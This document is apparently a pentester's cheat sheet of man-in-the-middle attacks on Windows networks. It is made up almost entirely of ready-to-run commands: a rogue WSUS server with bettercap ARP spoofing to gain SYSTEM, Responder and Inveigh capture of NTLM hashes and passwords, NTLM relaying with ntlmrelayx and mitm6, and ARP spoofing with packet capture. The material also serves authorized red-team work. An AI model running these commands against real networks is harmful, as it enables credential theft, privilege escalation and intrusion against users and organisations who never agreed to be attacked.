MITM

WSUS HTTP misconfiguration

Requirements
  1. Possibility to have MiTM position with the vulnerable host
  2. Communication between the victim and the WSUS server is over HTTP

If you have user access on the victim machine, it will permit to get SYSTEM privileges.

If the poisoning does not work (different broadcast domains) and you have access to victim machine, you can attempt to setup a system proxy manually (attacker IP and port 8530). The proxy redirection of the port 8530 will still be needed.

You can also spoof other machines, but you depend on the update frequency.

Check registry on WSUS client machine

Protocol should be HTTP in key WUServer. Example of vulnerable URL:http://wsus-server.local:8530.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"

Check that the computer uses WSUS for update, and the update policy.

REG QUERY "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"

GPO alternative: Group Policy–Windows Components > Windows Update > Specify intranet Microsoft update service location.

Tooling install

Install from https://github.com/GoSecure/pywsus.

Activate venv if used during setup.

source ./venv/bin/activate
Start WSUS rogue server

Ensure PsExec64.exe is in pywsus current directory (WSUS will only accept MS signed binary).

python3 pywsus.py -H <ATTACKER_IP> -p 8530 -e PsExec64.exe -c '/accepteula /s cmd.exe /c "whoami > C:\\poc.txt" '
MiTM position

Content of wsus.cap:

set arp.spoof.targets <COMMA_SEPARATED_LIST_OF_TARGETS_IP_OR_MAC>
arp.spoof on
set any.proxy.src_port 8530
set any.proxy.dst_port 8530
set any.proxy.dst_address <ATTACKER_IP>
any.proxy on

Start poisoning.

sudo bettercap -i <IFACE> --caplet wsus.cap

Responder

Set challenge to 1122334455667788 in /etc/responder/Responder.conf

The option -f may prevent challenge-response capture.

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM

NTLM MITM attacks

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Packet can be captured in order to extract the hashes

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack https://crack.sh

misc::easyntlmchall
NTLM Relay

SMB signing has to be disable for this kind of attack. On Windows 10 machines IPv6 is prefered as IPv4.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
responder -I <interface> -r -d -w
ntlmrelayx.py -tf smbrelay.txt

Add computer start BH (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer
python bloodhound.py -d <domain> -u <computer>\$ -p '<password>'

Priv exchange (not tested)

ntlmrelayx.py -t ldap://<dc_fqdn> --escalate-user <user>

python privexchange.py -ah <fqdn> <dc_fqdn> -u <user> -d <domain>

IPv6

mitm6 -d <fqdn>
ntlmrelayx.py -wh <webserver_hosting_wpad>:80 -t smb://<target_ip>/ -i

Relay and delegation
- https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv